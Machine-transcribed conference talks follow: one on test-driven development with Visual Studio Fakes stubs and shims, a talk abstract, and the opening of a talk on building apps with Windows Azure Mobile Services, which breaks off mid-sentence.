in the right mind would want to see 300 mock classes sitting around it's kind of scary to think about it so this is a time when we start looking for a tool or a library and then you would say should I use a rhino mark should I use a you know what type mark whatever that you want to mention in today's world you take the word mark and put a word in front of it there's a framework or library with that name right so you will go find some tool and use it like I said I've used rhino mark in the past and here's when I would scale into using a rhino mark so what would I be doing here within my test itself I would create a mock object and use it I'm going to use do a little different something a little different here rather than using rhino mark I'm going to use a fakes library in visual studio 2012 the reason I'm going to use that is I'm going to get into a little bit more complex situation later on in the session and it is much easier to work with fakes in those situations so I'll come back to that so I'm going to use a library here but the library I'm going to use is the fakes library to do this let's take one test at a time and convert it over and when I'm done with it these two mock classes will simply disappear so let's get to the first test by the way because that's a simple test what does it do it simply says hey mark simply return to me a hundred that is all your job is so notice what I'm going to do I'm going to go in here first of all and in the test library I'm going to find the library I depend on so this is the test library this is the library depend on and I tell him to go ahead and add fakes assembly so this really brings in a fakes library which allows us to easily create marks in this particular case so now that I've added that it generates a piece of code under the hood and we can start using it so in this case what I'm going to do is to remove this part for a minute and I'm going to simply say equals new rather than creating a mock vendor service instance here I'm going to simply say new and this is my library which is the currency exchange library dot fakes dot and I'm going to say give me a stub for the eye vendor service so I'm asking him to give me a stub for the eye vendor service class itself so instead of creating my own mock class I just relied upon the fakes library to create it and I just instantiate it right here so the burden of me creating the mock class separately just disappeared but of course I have to tell him what to do how do I tell him what to do this is where lambda expressions kind of plays a nice syntactical sugar here so I'm what is the method I'm interested in well the method I'm interested in get rate for vendor remember that's the method that the class has but remember in C sharp we can have function overloading so that could be multiple methods potentially with the same name and how do you tell him which of those methods you are interested well you know that well multiple methods can have the same name their signatures have to be different so a method name combined with the signature makes the name unique so that is why notice over here the name of the method is get rate vendor string string because it accepts two strings as parameters so we simply give him a lambda expression here we say vendor name and currency and all that I want him to return is a value of hundred from this and we simply told him just return back a value of hundred so that is our mock object we just instantiate it right here within this test and that is all we needed to do let's go ahead and run this test real quick and notice the test is still passing at this point but let's go ahead and remove this mock class now because we no longer need it in fact while I'm removing this mock class I'm going to go ahead and remove the other mock class as well so we got rid of both the mock classes we created so we don't have that burden of creating extra classes anymore but instead what we are going to do now is to go to the second test at this point and right there is the mock vendor service that blows up sitting here and instead of doing this again we are going to simply say here one more time this is going to be the currency exchange library dot fakes dot stub for service and we will simply ask him to create an instance again and in this case the instance we are going to create over here is going to take the get rate exchange and what does this do by the way well it's going to take a vendor name and a service currency again but I want this to blow up in order to do this you put a little curly bracket because you are not just returning a value at this point and simply say throw new application exception and this is going to simply throw with simulated exception as a value that I wanted to throw back at us so that is the exception we are going to throw from this little method itself and this is going to be the simulated exception that I want to throw back from here so let's make sure this is working at this point and we can see all of our test is still passing so we did a fairly lightweight mocking but we used a fakes library so what's going on at this point by the way the fakes library essentially is creating a stub for us automatically it creates this a compile time and so we are simply setting up this by entertaining a few properties on this so the get rate for vendor string string is actually a property on this class a public property on the class and you are assigning a lambda expression to it and that's how you are saying this is what I want you to do so when we make the method call the call then calls the service which really is the mock that we implemented fakes introsyps that and says here you go I am giving you a value of 100 or throwing an exception where it makes sense does it make sense so far so the benefits so far we don't spend time creating mock classes we simply set up our mock and use it well that's great so far in this case but let's get to a little bit more complex situation what if I have two vendors by the way well if I have two vendors I want to be able to handle multiple vendors here obviously but how would I set up the mock for that so here is my test for that I will say rate when two vendors given and I will just write one test here instead of two tests with the high rate by the way so I am going to say second vendor giving the high rate so currency exchange currency exchange over here is going to simply say a new currency exchange we got to give them a vendor service so we will say vendor service and I am going to set up the service in just a second we will come back to that so what am I going to do with this vendor service itself well I am going to ask him again what is the expected value so expected equals new tuple once more string and double I want this to return a vendor to by the way and I want this value to be let's say a 48 is the value I would expect from here and then of course in this case let's go ahead and say I want to call result equals we will call it rate equals currency exchange dot get rate and of course let's give them the currency name and assert equals and this would be of course expected and then rate itself but for this to work I got to set up the mark properly but before we do this we have to tell him the vendors as well so currency exchange dot set vendors this time I am going to give them a vendor one and a vendor two as well now for this to work obviously we have to make a little bit of effort here so to do this let's go back to the code and we will tell the set vendors to take a collection of vendors itself so we will say params over here and this be vendors rather than vendor by the way so a little small refactoring code and this will become of course a vendors collection that we have to deal with so we will just simply say vendors over here which is going to be a collection let's just initialize it to a new string of empty vendors so let's go ahead and say that's the value that I am interested in creating to begin with alright that is good so far now what am I going to do with the vendors collection itself I got to set that up in the mock object so let's go ahead and do that so here is the vendor service so vendor service equals and in this case of course I got to tell the mock one more time so let's go back to creating the currency exchange library and we will tell him to create a stub but this one is going to do a little bit different than what we did before so here is my get rate for string string equals and here is the vendor again in currency and all that I am going to do simply is return from here let's call it rates and then a vendor so rates is basically a little map I am going to create right here so let's go ahead and say bar rates equals new dictionary and this is going to be a dictionary of string and double and this is going to simply accept a bunch of values for us to use and the value that I am going to tell him to use is going to be a vendor one so let's say vendor one and rate is going to be let's say a 10 and it's going to be also a vendor two so let's go ahead and give him a second value for this mock so this is vendor two and let's go ahead and tell him the value is 50 in this case that I want him to use so let's make the compiler happy right here so let's go ahead and use a using for it so I think we are about ready to try this example but for this to work obviously our code has to use multiple vendors so we will get back to the code where do we deal with it well rather than saying use the if statement we will quickly convert it to a for each statement and then we will say here for a vendor in this is going to be vendors itself so we are going to go through each of the vendors here and if something fails of course we want to log it but we haven't gotten to that yet we will come back to that in the next example so what am I going to do at this point so in this case of course this is going to be a vendor we are interested in talking to and if it is true it is going to use the vendors name otherwise we are going to log the exception and move on so assuming that we did all that right we can try to run the test and we can see that the test are again passing so we implemented and refactor the code to use multiple vendors. Let's kind of up this a notch now I am going to skip these three vendors for now but I want to deal with an error condition what if a vendor fails we already saw that we have a way to handle the error but I want to log a message how do I log a message when something goes wrong well let's think about this for a minute again by writing a test case so here is my test for logging a message so back over here in the test class let's go ahead and write a little test that says rate when log message let's say log message when a service and service fails so how do I write a test for it first of all we got to decide where we want to store it maybe I want to store my error messages in a errors.log file so let's say assert are equal and I want errors.log and this is where my error file is going to be and that's where I want to store it so I am thinking about the expectation first and then we will fill in the code what is the message I want to store by the way so assert are equal one more time and what's the message the message I want to get is going to be this message let's go ahead and say the message is error talking to service for vendor one and then on and I want to put a date over here but I don't know what date to put yet so I will just put a blank for now and then the error message is going to be simulated exception right so this is what I want the exception message to be error talking to service for vendor one on that date and the error message is simulated exception let's see how we can make this work so to make this work I am going to first of all tell my currency exchange that I do have a vendor to work with so this is going to be the code for it so I am going to simply tell him that I only have one vendor vendor one because that's all I care about right now but I have to tell him to blow up on that time that's very easy to do so I am going to say currency exchange dot get rate and here is the rate I provide for him and what about these messages by the way so let's go ahead and say bar error message or error file equals empty and bar message equals empty as well so those two are empty to begin with let's go ahead and set the mark by the way so that it fails to return back the value properly when the mark tells us to fail so I vendor service so here is a mark we already created we can reuse it with a simulated exception so I am going to grab this part right here so let's go ahead and move that you can always refactor these tests to reuse some of those parts by the way so you don't have to duplicate it so many times so this guy blows up as you can see let's go ahead and run the test and see what it does so when I run this test in this case it should tell us that oh wait a minute this is saying the when the two is broken so let's go ahead and see what this was doing first of all maybe I was not noticing that a few minutes ago so what's this failing with when the two vendors are given so in this case of course pardon me so since the other test is failing I should worry about that first so get rid of this for a minute we'll come back to this so let's go back to that test there we go so let's see why that test is failing I didn't pay attention as I was speaking so let's go ahead and see what error he gives us here he says aha the value is 48 instead of 49 Venkat cannot do math on Friday evenings 49 is 2% down from 50 isn't it yeah thank you so that's basically the reason why that failed let's make sure that's working great so let's get back to this test here so what does this do by the way this says I want to go ahead and create a mark that blows up and once it blows up I want to call the get rate and the get rate should tell me that it's locked the error to error file and that's a message it logged but how would I do this when I run this it fails what's the reason for the failure it tells me the error message was a file name was empty whereas I told him that the file name would be called errors dot log he says what are you talking about that didn't happen so let's think about how we're going to implement this I'm going to go to my get rate method when there is a failure my get rate method is going to say hey go ahead and send this to a file for logging the error so I'm going to talk to a file and what do I do with the file let's keep this very simple typically it would use some kind of a logging library that's fine you can still you know mark that out here as well but I'm going to just write to a file so what am I going to write to in this case well I'm going to write to a file object but where do I get the file object to mark from notice in the previous example what we did to mark this out we created a mock object and then we sent it to a constructor injection we said you could do a constructor injection or a setter method injection but none of those will work in this case because the fact that I want to use a file is my internal business now typically when you read about a test event development people will tell you yeah that's really important expose that as a as a interface so we can send it yes you can do that but that causes unnecessary complexity I don't want to go that route well it turns out fakes actually has a way somewhat of a peculiar approach but it really is an aop approach an aspect to end the programming approach it gives you a way to set up what are called shims shims are a lot more powerful than stubs but they're also more expensive at runtime so be very careful using them but what a shim is it can really intercept your call quietly right in the middle and say rather than going over there hijack the call to this particular implementation so it's purely an aspect oriented implementation where you can intercept calls very quietly and take them elsewhere without even the code knowing that you're doing this so notice what I'm going to do here to make this work so the first thing I'm going to do here is right where we are calling this method I'm going to go around this method to do this job so I'm going to first of all go back to this code but it to run this you need a context to run it in so I'm going to create a using block right there and and with them this using block I'm going to say a shims context dot and I'm going to call a create method so create so what is this shims context well shims context gives you the context of execution for the shim it comes from the testing dot fakes namespace as you can see here so we created a method that is going to bring it in and right within this I'm going to call this method get rate so this gives a context of execution where it is going to start intercepting things but what am I going to really intercept here by the way so I know where files is located it is in the system library so I'm going to select it and say add fakes assembly for system so we brought in the fakes assembly for system and now I'm going to say here the system dot of fakes IO dot fakes over here so I'm going to bring in fakes so let's make sure the compiler compiled it so let's go ahead and make sure this compilation works so I'm going to go ahead and ask him to bring in the system dot IO dot fakes over here dot file so I'm going to bring in a shim for a file and then I'm going to say dot and I'm going to write all straight text and notice very similar to what we did before I'm hijacking the write all text method and what is this method going to take by the way a file name as a parameter and the error message as a parameter and all that I'm going to do within this method by the way is simply to write in here I'm going to simply say go ahead and set the error file name to file name for me and the message to error message for me so I grabbed these two values and I just set it that's all I did the test won't still work obviously because we haven't changed the code to do it yet but notice what I'm going to do now I'm going to go into the get files method and I'm going to tell him to use this file to write to it so let's get back here to the file and say when there is an exception by the way go ahead and go to the file class by the way and in the file class go ahead and write all text so write all text and where am I going to write by the way to the method errors dot log and what am I going to write a message I want to write well what is this message I want to write message is going to be a string dot format and what is this format I want to write at this time well the format I want to write here is going to be this message with a few values embedded in it but let's figure out how to write this so let's grab this for a second let's get back over here and say here is the message I want you to write in which case error talking to service for well this is a value I want to give on this is the value I want to give so let's just say a one for it and what is the error message that is the value I want to give so let's go ahead and replace that with a two so let's go ahead and say what these values are the first one is a vendor name the second one is a time which I don't know yet I'll put an empty for it and the third one I want to give is the exception dot message itself in this case whatever went wrong I want to give that message let's go ahead and run this test and see what it does and notice the test is passing now so what did we just do what we did was in the test we said given this particular code go ahead and simulate away and mark away the right all text string method itself from the object right so we are sitting outside here and kind of telling him what to do deep down here so it is a it's a very powerful dependency injection without being intrusive very powerful but be very careful using it don't use this for all purposes so then within this code without knowing any of this happening we quietly write to this file one last thing I want to fix here by the way before we go I want to come down and say what is the date by the way well obviously what I want to do is I want to display the date and time when this happened but there is a problem right if I say date time now whenever the test is running it's going to find the time how do I know what the value should be here hey why don't you find the date time and send it you're still working on this micro second differences and test start failing at times which becomes really annoying so to fix the problem what we're going to do here we'll simply say here 614 2013 and then let's just say 8am so 80000am that's all I put so I put a random time right here and I said that's the time failure I want to have well of course I go to the code now and I'm going to say here simply date time dot now and I'm going to run the test when I run the test notice what happens the test is going to fail but the message of failure says hey you expected at 814 2013 8am but what I really got was 614 2013 359 22pm well let's fix that real quickly I can go back to the test message itself and say well this is going to be 614 by the way but that still fails because of course I removed the zero what about the other value no worries we can easily fix that so I go back over here and say system over here dot date time and then dot actually for the fakes right dot fakes and then I bring in the date time shim and then but this one by the way is on the instance over here isn't it so I'm going to say get now and then I'm going to ask him to return for us a new date time with whatever value you want to simulate in this case I'm going to say 12 what is the values that the date time takes by the way well it is taking a value of years so 2013 month is 6 the day is 14 8am so give those values and then those are the values I want him to return and go ahead and run the test and now we faked away the date time object itself so the code when it comes and calls date time dot now it is not returning the real date time anymore but the simulated date time we created up in the fakes over here so this gives a fairly powerful way to reach in and mark but like I said be very careful using it don't do this for everything you do and this can also be a little slow in computing but this really gives a way for us to deal with the dependencies once we finish this of course we can now step back and start writing the class for implementing the interface we wrote and to do that by the way we can approach very similar way and you don't have to really force you to write the real code until your test pass and gradually you can get to the point so if you are interested in looking at the code to talk to the web service feel free to download the code from my website and you can download the code and play with it it's fairly simple concept but it's more of an approach to follow and the tools definitely do help what we are trying to do here so test driven development is extremely approachable and I've looked at pretty normally code to write test for but I haven't seen a problem so far that I say don't it this code is untestable it always has been a design issue and once we kind of figure out how to reach in tools do help but tools are not the only solution it's a combination of approach we take and the tools we apply that makes the big difference I hope you found that useful thank you.
|
Test Driven Development is easy, if your code has no dependencies that is. The reality of our world is mired with dependencies, however. All the idealistic approaches to unit testing soon fall flat when the tests meet the realities. Mocking can be an effective way to alleviate these concerns, at least that is what we have been told. However, mocks often tend to burden our tests and make them hard to maintain. Seems like we are in a quagmire. In this presentation we will learn some simple techniques that can help us be quite effective with mocking. We will start a couple of problems that have dependencies. We will then take up the task of creating automated unit tests for it. Along the way, using testing and mocking tools, we will learn some effective ways to deal with the dependencies and create maintainable automated tests.
|
10.5446/51529 (DOI)
|
Hello, can you guys hear me? Yeah. It's 5.40, so time to get started. Thank you for coming to my talk. My name is Yavor. I work at Microsoft in the Windows Azure group. I work on a product called Windows Azure Mobile Services, which is a very easy solution for you to build Cloud-connected mobile applications. So in the next hour, we're going to spend about 20 minutes introducing what mobile services is, and most of the talk just going through our key scenarios doing a bunch of coding demos. So I hope that's what you're here to basically learn how to write an app with mobile services. I know it's the last session of the day, so I'm a little bit tired. I was a little bit sleepy going up the stairs here until I realized my podium is actually floating over the edge here a little bit. So I woke up pretty quickly after that. All right. So how many of you have used mobile services before? Let's see a show of hands. Okay. It's very bright in here. Maybe five people. How many of you have actually built an app and finished it with mobile services? Okay. So two experts we got here and everybody else pretty new. That's pretty good. So yeah. Pretty much covered with the agenda. What we're going to cover, we're going to spend a little bit of time at the end talking about kind of future things that are coming up with mobile services, what's in plan for the next six months or so, and then leave a little bit of time for Q&A at the end. So I already talked about this, but what is mobile services? Why are we all here? Well, we know there's a lot of developers out there that want to write apps for mobile devices, Windows Phone, Windows 8, iOS, Android, but they don't know how to write server code. So the goal of our product is to enable them to easily write these connected apps without the need for server code. If you'd like to write server code, if you're a server developer, you can by all means come and use our product as well. But kind of our key message is you don't have to. We provision the back end for you, so you don't have to worry. So before I go into this, let me actually show you what kind of apps we're talking about here. So let's say I'm a little hobbyist developer and I want to write a little game. So I have this Connect 4 game. So I connect four dots in a row and I win. And I want to put it in the store and I want to make it social. I want people to be able to play with each other. So let's go and see what I came up with. Here's my little very primitive UI. And I have kind of on the left side, you'll see the open games. So these are games that are waiting for players. And then on the right side, you see the games I'm participating in. So this is kind of my simple game that I built here. And then I can create a new game. So I press Start New Game down here. And I'll open a new game. So here you go, game 14. And the first thing you notice, it actually knows who I am. I didn't have to sign into this app. So that's one of the things that mobile services does for you. It takes care of authentication. So I threw a single sign on the app and you already who I was without me having to type in my credentials. OK, great. So I created a new game. What if I want to join an existing game? Let's say I want to join game 10 here. And I have a little loophole in my code that lets me play with myself. So I can actually demo this without inviting somebody else on stage. So there you go. Here's my game. And then I can go ahead and try and make a move. OK, and what just happened? I actually, up here in the corner, you didn't hear it, but it popped up. It's a push notification. So because I'm both the red player and the yellow player, it's like, oh, well, it's your turn. So OK, I make another move. And I'll get another push notification. So as a player needs to do something, he gets a push from the server. OK, so that's great. I have a Windows 8 app. But I want to maximize my revenue. I want to go and use the Windows Phone Store as well. I want to go in the iTunes Store as well. So let's go to more platforms. I don't want to just do Win 8. So if I head here to my emulator, I actually have Windows Phone 8 brought up. I have, using the same mobile back end in the cloud, I've built a Phone 8 version. And Phone 8 is a little bit different from Win 8. Authentication works a little bit differently. So I have to actually log in this time. But I'm using my Microsoft account. So I didn't have to create a different set of credentials or anything like that. And I can't hide my password, so I have to type it kind of in the corner here. If somebody knows a trick about how to do that, let me know. All right, so I'm logged into my app now. I have to authorize it. I get the same familiar view of the open games and the games that I'm participating in. And you'll notice it's the same server data. It's the same list of games I had before. I go into my game number nine or 10, whichever one I was playing here. And so it's pretty much the same UI. I can go and make a move again. And I have the Windows 8 version installed, so I still get my push notification, no matter which device I'm playing on. If I'm playing on a Win 8, I get it on the phone. If I'm playing on the phone, I get it on Win 8. So let's try it the other way around. So I'll make another move here. I'll go back to my Win 8 app. I'll make a move here. And then if I go back to the phone now, actually, I need to minimize the app so I get my toast notification. So if I go back, make another move in Win 8, and then go back to my phone here, you'll notice I got a phone notification as well. So it does the right thing. It notifies all the devices where I'm playing the game. It knows who I am, sends the push notifications correctly. So that's the value proposition of mobile services. It does things like auth, push, and data. Really super easy. OK, so it's just kind of another way of saying that. We have these kind of vertical pillars, identity, messaging, notifications. We provide kind of a common single management experience. So you go to the Azure portal, you go in one place, and you manage all these things for your mobile application. And we provide a single API, a single consistent API that you can code against to access all these capabilities. That's really what mobile services provides for you. Our mantra for mobile services is really simplicity with enablement. And what we mean by that is simple things should be really simple. Getting the three things I mentioned, push, auth, data, getting those things started should take you five minutes, or 10 minutes, but no more than that. Then if you become an advanced developer at that point, or if you already are an advanced developer, if you already have been writing server code for the longest time, you shouldn't be trapped. You should be able to extend it. So that's why we say simplicity with enablement. We leave a lot of extensibility points open for you. So you can go ahead and build on top of what we offer. I like to put these Legos up here. You can be the guy on the left who wants to just follow the directions, and he knows that in five minutes he'll end up with this exact product that he's aiming for. So it's very productive, very predictable. We want to do that. We also want to cater to the guy who wants to kind of tinker and add things. So we try not to be one or the other. We try to kind of let you do both. We're a pretty new service in Azure. We've actually been around in the portal for maybe only around a year now, or even less than a year. But we're a very feature rich platform. So some of the features we have are listed here. Some are in the pipeline, and even not listed yet. But we support a pretty full set of clients at this point. Windows 8, Windows Phone 8, Windows Phone 7.5 we added recently, Android, iOS. We have this HTML client, so you can actually use a website and this JavaScript to talk to your mobile back end as well. Or a PhoneGap application. So that's kind of an interesting cross-platform scenario where you guys are familiar with PhoneGap, most of you? It's a solution that lets you write your application in JavaScript and then publish it as iOS, Android, and all the different stores. So kind of a way to do it once and get in all the different stores. So you can do that with our HTML client. So yeah, pretty good support across the board for the different clients. We even support actually ASP.net. So if you want to have your server back end talking to your mobile back end for some reason, I mean there's some people that like to do that. We even support that for you. We support authentication with the four big auth providers today. Microsoft Account, Facebook, Twitter, and Google. We support push notifications. You had a question? Yeah, do you support connecting the different authentication providers to the server account? No, so that's a feature that we don't have yet, which is the question was can I connect my different identities from the different providers into a single identity? We don't support that yet, but it's something we've thought about as coming probably in the next six months to a year. So push notifications, I already demonstrated. Scheduled tasks is one thing we added just about six months ago where if you want to have a cron job running or a scheduled task inside your mobile service to send periodic notifications out to all your customers, you can do that. The next point is actually a really important one, which is our ability to write actually server side logic. It doesn't have to be simple, like I said. And we support the server side programming model where you can write business logic. You can write validation rules and things like that. And it's all Node.js, so you can use the entire Node package manager system to bring in extra functionality into your back end. It's actually quite rich and quite extensible. The next point is a custom API, so that's kind of more rich HTTP APIs. That's a brand new thing that actually came out just today. You guys are the first ones to hear about this feature. Scott Guthrie hasn't even blogged about it yet, but he said I could talk about it to you guys. The next one is also brand new. So we support source control. So you can now edit your scripts either in the browser or via Git, publish them via Git to the cloud. And then we have great extensibility. We integrate with Pusher and SendGrid. So if you want to use third party services with your mobile service, you can do that as well. So pretty packed service. We do a lot. And for services still in preview in Windows Azure, I feel that's great. It's a really useful little thing. We also focus a lot on great developer resources. So we have our developer center, which gives you tutorials in all the different clients. So you get to pick. I'm running an Android app, and then we have an Android version of every tutorial. So that's pretty great. The other thing is GitHub. We keep almost all of our source code on GitHub. And it's open. We develop on GitHub, actually. So it's not like we hide away, and then we publish the GitHub once every six months. Our bugs are actually in the issue tracker. And you'll see our developers making commits into this thing daily. So we try to be very open. And we actually even take contributions back. So if there's a bug that we're sitting on and not fixing, and it's really blocking you, you can actually go ahead, open a pull request. Me or one of the other PMs on the team, probably Paul, we're going to review it, get back to you, and merge it into the product. And it's going to ship within the next couple of weeks. And you have your bug fix in the Microsoft products. That's pretty great. And because NDC is such a special conference, I'm giving you all 10 mobile services for free, each one of you. I'm getting blank stares. They're always free. 10 are always free. It's not really. Sorry. But there is another thing, actually. I'm giving you all free car. It's actually kind of true. So if you have an MSDN subscription with Azure, and you have an MSDN subscription, and you haven't activated your Azure, whatever it is, credit as part of the MSDN subscription, they're actually running a promotion right now. And as a chance you'll win an Aston Martin if you go to this URL. So if you haven't activated Azure on your subscription, there's never a better time than now to get your Aston Martin. That's actually a real thing, not a joke. All right, so enough talking. Let's jump into the code here and see how we build one of these things. So the first thing I'm going to do is head over to the Azure portal, which is where all good things start. So I go to the Mobile Services tab here on the left. It's this little icon that looks like a phone with a little sugar cube inside of it. And here's all my apps that I've listed. So I created just a few minutes ago this testing app. It's completely empty. It doesn't have anything. But I just want to give you an idea of the experience of starting out with mobile services. So it's a blank app. All I did is say Create. And then I see here the choice of the different client platforms. So I get to decide how I want to get started with mobile services, which platform I'm going to use. Let's say I'm trying to write an Android application. So I'll click on Android. And we have this kind of contextual getting started experience here with three easy steps. The first step is it tells me go ahead and install the Android developer tools, because you need that to write Android apps. Then I can create a table to store my data. So it's just I click this button, and it's going to do this to do items. So it's going to be like a to-do list application. And it says I already created it. If it wasn't there, it would have created it for me. And then I can download a pre-populated, pre-configured Android application that I can get started with. So I can go hit Download, and it'll just bring this zip file down. It's about a megabyte. Very easy. I've already done that. And because my emulator is super slow, I went into Eclipse. I imported my app here with our mobile library here. Mobile Services Library. And then I started up in the emulator. And this is what you're going to get right out of the box without doing any work, is this cloud connected app. And so I can go and add something here. Let's say give my talk. Add an item to the list. And then I can go and also mark something completed. It's always risky doing on stage, because these emulators have very particular networking requirements. And sometimes it'll drop off without knowing why. So I'm making changes to my server data. And if I just head back to the portal here and click on this data tab, I see the to-do item table I just created. And I can actually browse all my items in real time, the ones that are stored in my cloud back-end. So here's the give my talk item I just created. I can check in real time whether it made it. So there you go, in just literally five minutes. And you can have an app that you can take to your boss and be like, look, we have an Android expense app now. Finally, it's done. Just change the title from to-do list to expenses. And you're all expense approval and you're done. So great. So that's how you do the very basic thing, create a table. Let's look at some of the other tabs here. Actually, while I'm in the table itself with my data here, there's this script tab. And I talked about the server scripts that you can write. So I can go ahead here and actually write a script for all the four code operations against my data. So if I want to validate that you're not allowed to do list with swear words in it, or you're not allowed to submit an expense for more than $1,000, I just write a simple node script here. Some of the other tabs, the scheduler, is where I do the scheduled jobs that I mentioned. Push and Identity is where I configure my push and identity and authentication settings and things like that. Logs is if my app generates logs in the server, we want to make it very easy for you guys to see those logs. You don't have to go remote into the VM and poke around some folder somewhere. We just bring them right here to the portal. So that's kind of a very quick lap around mobile services and the basic things it does. Any questions before I dive into my game and show you how that was built? Question right there? I'm sorry, I couldn't hear you. Support for node on server scripts and for what exactly? No, so currently our server, the question is do we support anything else but node in our server scripting model? Currently we only support node in our server scripts, but it's definitely one of the top two or three things that people ask for, especially if you're a.NET developer. You're writing your Windows 8 app in.NET. You want to write your server in.NET as well. So that's something we're definitely looking at. It's a little bit tricky though because we don't want to scare away people that want to write Android apps and iOS apps. We picked node because it's kind of a neutral thing that everybody's fine with. If we made it.NET, we would have scared away a lot of people. So we want to ideally have a choice for you and let you pick which one. Great, so let's go into my little app. So here's, I've already pre-created it. It's called Align 5. Here's my errors from before. But the first thing we want to look at is kind of my data tab here. And so my app, my game is powered by these two tables, my games and then my players. So when somebody first opens my game and they type in their credentials, I create a little player record for them in this players table. And the games table just contains a record of all the ongoing games. So pretty easy. Let's jump into Visual Studio here. So I think I have the phone one and the Win 8 one open side by side. This is the Win 8 one. So the first thing I needed to do is in my Win 8 app, I need to add a reference to the mobile services SDK. So we're actually up on NuGet. So if you go to manage NuGet packages, you can see the package I referenced, basically, which is windowsazure.mobileServices. That's our package. And we've tried to be, remember going back to that simplicity with enablement thing. We don't want to really tie your hands and implement everything in a little closed box that you can't look inside. So we've taken advantage of a lot of the community packages that are out there. Instead of using our own serialization, we use json.net. Instead of writing our own HTTP client, we use the HTTP client that ships with the framework. We support portable class libraries, which is a great way to make the same code actually run across a bunch of different C-sharp platforms. This is why you can easily write ASP.net code as well using RSDK, because we use portable libraries. So that's great. This is pretty new. It's been only out there for a month or two, our NuGet package. So that's the first step. By out of the NuGet package. And then I need to configure my connection information. So if I go back to the Quick Start here and say I'm using Windows Store, I need to have the URL in the application key so that my application can talk to the mobile service. So it's just right in here. And I've pasted it inside my VS instance. I've put it in kind of a little config file somewhere, because I didn't want to accidentally check it into source control or anything. So I put it in a little separate file here. And then I created an instance of mobile service client, which is kind of your entry point into using mobile services. I just created it here and pulled in the URI and the application key. So I have my instance here. Now I can use it from anywhere inside the app. So the first thing I'm going to do is in that page where I list the games. Let's find that. Main page. I create references to these two tables that I showed you, the game table and the player table. And I use the mobile service client that I put in my app static class. And then I have these two local objects, the game object and the player object. So if I go to the game object, you'll notice they're just polkos, plain old C-sharp objects. Nothing special here. I've added some JSON.net serialization attributes, because I prefer to lowercase my properties, but that's really a personal preference. You don't need to add these attributes. It's pretty simple classes, right? Just game and the names of the players and things like that. So that's pretty easy. But the one thing that I want to draw your attention to is in the portal. I didn't ask me anywhere when I create these tables, my games and my players. This is how I create a new table if I wanted to. It doesn't ask me anywhere, OK, what columns do you want? What schema do you want for your table? And that's one of the cool things that Mobile Services does for you is it will actually look at the object that's coming in on the wire, the JSON. It will just try to infer what database columns it needs to create. So actually, we call it auto schema or default schema. It will just infer based on what's coming in and pre-populate your table for you, which is a huge time saver if you're quickly prototyping an app. Then when you go to production, you want to turn that off, because you don't want just some random person with Fiddler going in and adding a bunch of new database columns. So you want to turn off that feature in some of the configure tab. Or maybe on the enable dynamic schema. So you just go ahead and turn that off when you're done with your development. OK, so we went through. And then let's see the actual, so how do we actually insert into this table? Let's go down here. I'll skip a few of these. Let's go this refresh method. And that's the method that fires whenever somebody goes on that page, basically, after they've authenticated and done all that stuff. So I'm using link on the client, which is actually pretty sweet. So the open games are just games that player one is set to something, but player two is not set to something. So that's how you know it's an open game. And then my games are the games where I'm either player one or I'm player two. But it's a pretty ugly looking link query. Imagine how hard that would be if you had to write a SQL. I mean, it probably wouldn't be that hard if you're a SQL expert. But we try to make it super easy to do things like this. And this is link on the client, but actually gets serialized and run on your server. So it's not running client side. It's actually running server side. So it's easy, but also performs pretty well. So that's how you just load up a bunch of stuff. And then I call two list async. So I put my link query, and then I terminate it with something like that. So we can give you a list, or if you want, we also have two collection async. And we have two incremental loading collection. And these are a bunch of really nice convenience things we added. If you want to bind to that control and winnate, the infinite scrolling thing, you just use one of our collections that does it out of the box. You don't have to worry about implementing all the loading events and all that. We try to make that super easy. So we covered loading stuff into it. Let's look at updating something. So I go against my table, and there's an update async method, pass it the new updated table, very straightforward. Insert as well, very straightforward. Just insert async. I pass it a new object instance. In this case, a blank game. If they click New Game, I just create a new blank game and insert it. So that's kind of the basics of the data model on the client. Now let's look at the way we do scripts on the server. So if I go back to, let's say, the games table here, and then I go to the scripts. Let's look at the scripts I actually have. So here's the insert script, which happens when someone tries to create a new game. Let's go kind of piece by piece. So you'll notice it's kind of a set shape. It has to be called insert, the little function. It has to have these three parameters. First parameter is the thing that they pass me on the wire, deserialized. The second thing is the user object, which is something as part of our authentication model, which I'll talk about later. And request is a handle to the incoming and outgoing HTTP request, so you can read things like headers, and you can go and write stuff out to the response directly if you'd like. Then I start modifying the object that came in in my script. So I'm not going to trust their own ID. Like if they want to pretend to be a different user, so I'll use kind of our authentication to get the right ID. I'm not going to trust the one they configured. I put the state here, which is where I store the actual grid and where each move has happened. Who the active player is. I remove some properties. Then I call request.execute, which is how I tell mobile services, OK, I'm done with this object. Go ahead and process your pipeline going forward and insert it in the database. If I want to run some code after the insert completes into the database, I can add a little callback here and I'll fire after the complete is done. So insert is pretty straightforward. If I go into update, update is kind of the biggest method here. It's kind of huge. My entire game loop is inside this update method. It's a little bit cheating, but let's see what it does. So when they send me an update with a new instance of the game object, I'm not going to trust the game object they sent me, so I'll use this local reference to game table to pull it from the database. So if I want to access another table from inside these scripts, I use kind of this tables global. And I say get table. That's kind of how I get a reference to the table on the server. So I get my own instance. And here's a little query syntax. I say where, and then I can pass an object here, and it'll just do an equality comparison. So I'll say, OK, the item they tried to insert, give me the real one. I don't want to trust the one they gave me. And then when it completes, you call the read method to run the query. And then when it asynchronously completes this success callback will fire. Results will be in this property, obviously. And then I can check here, for example, if there aren't any results. So they're trying to update a game that doesn't exist. I'm just going to go ahead with a request object and just return a 404 right away. So this is a good example of say, OK, I want to break out of the pipeline. I want to say, I'm done processing this. Let's just move on and return a 404. Like there's something wrong with this request. So that's how I abort the pipeline. And if there is actually any results, I say, OK, the game is the first result, because obviously the ID is the primary key, so it has to be the first one. And then depending on what they're doing, whether it's the first time they try to become the second player, I say, OK, they're trying to join the game. Or if there's already a second player, they're trying to probably make a move. It's a little bit silly, my game logic. That's not why you're here to look at my crappy JavaScript. But you kind of get a sense of how you write these server scripts. And they're not as scary as you might think. And we have great documentation in our developer center where you can go and kind of see with the learn a little bit more about the syntax. So we've covered kind of the data stuff. Let me see if there's anything else. I think that's pretty much all I had when it comes to data. Do you guys have any questions so far about how to handle data? Probably somebody's going to ask me, can I use table storage instead of SQL? Because this actually uses SQL server in the back end. The answer is not right now. We're looking into it. That's another very common question. Yep, over there. I'm sorry? I can just video it back end. Right. So the question is, can I just use my own back end instead of the database that we generate for you? That's a really good question. And that's really useful if you already have an existing back end. Say you have an on-premise application. Now someone's telling you, I want a cloud version of that. Or actually, no, they're telling you, I want a mobile version of that. So how do you do it? We currently don't support it kind of in a first class way. If your SQL server schema for your table is kind of in a very expected format, it will work. We give you a way to specify a connection string to a different database. But you have to follow our own convention about what your tables are called and all of 